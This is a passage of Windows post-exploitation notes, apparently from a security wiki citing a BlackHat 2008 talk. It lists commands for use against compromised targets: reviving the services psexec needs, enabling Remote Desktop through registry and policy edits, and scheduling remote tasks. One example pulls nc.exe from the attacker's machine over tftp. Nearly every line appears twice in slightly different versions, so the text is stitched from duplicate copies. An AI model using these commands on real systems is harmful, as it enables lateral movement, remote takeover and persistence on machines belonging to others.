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### Enable `psexec`
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### Enable `psexec`
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The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
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The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
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``c:\> net use \\[TargetIP]\ipc$ username /user:password
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c:\> net use \\[TargetIP]\ipc$ username /user:password
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c:\> sc \\[TargetIP] config netdde start= auto
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c:\> sc \\[TargetIP] config netdde start= auto
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c:\> sc \\[TargetIP] config netddedsdm start= auto
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c:\> sc \\[TargetIP] config netddedsdm start= auto
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c:\> sc \\[TargetIP] config clipsrv start= auto
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c:\> sc \\[TargetIP] config clipsrv start= auto
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c:\> sc \\[TargetIP] start netdde
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c:\> sc \\[TargetIP] start netdde
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c:\> sc \\[TargetIP] start netddedsdm
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c:\> sc \\[TargetIP] start netddedsdm
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c:\> sc \\[TargetIP] start clipsrv
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c:\> sc \\[TargetIP] start clipsrv
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### Enable Remote Desktop
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### Enable Remote Desktop
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Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
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Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
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1. On the remote system, execute the following commands:
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1. On the remote system, execute the following commands:
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``c:\> sc config termservice start= auto sc config termservice start= auto
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<pre>c:\> sc config termservice start= auto sc config termservice start= auto
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c:\> regedit /s enable_ts.reg
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c:\> regedit /s enable_ts.reg
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c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
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c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
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c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
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c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
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c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
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c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
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c:\> gpupdate /Force
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c:\> gpupdate /Force
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c:\> net start "terminal services"
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c:\> net start "terminal services"
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### Scheduler
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### Scheduler
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The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
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The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. It usually runs at the SYSTEM account privilege level. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
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``c:\> net use \\[TargetIP]\ipc$ password /user:username
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c:\> net use \\[TargetIP]\ipc$ password /user:username
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c:\> at \\[TargetIP] 12:00 pm command
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c:\> at \\[TargetIP] 12:00 pm command
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An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`
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An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`
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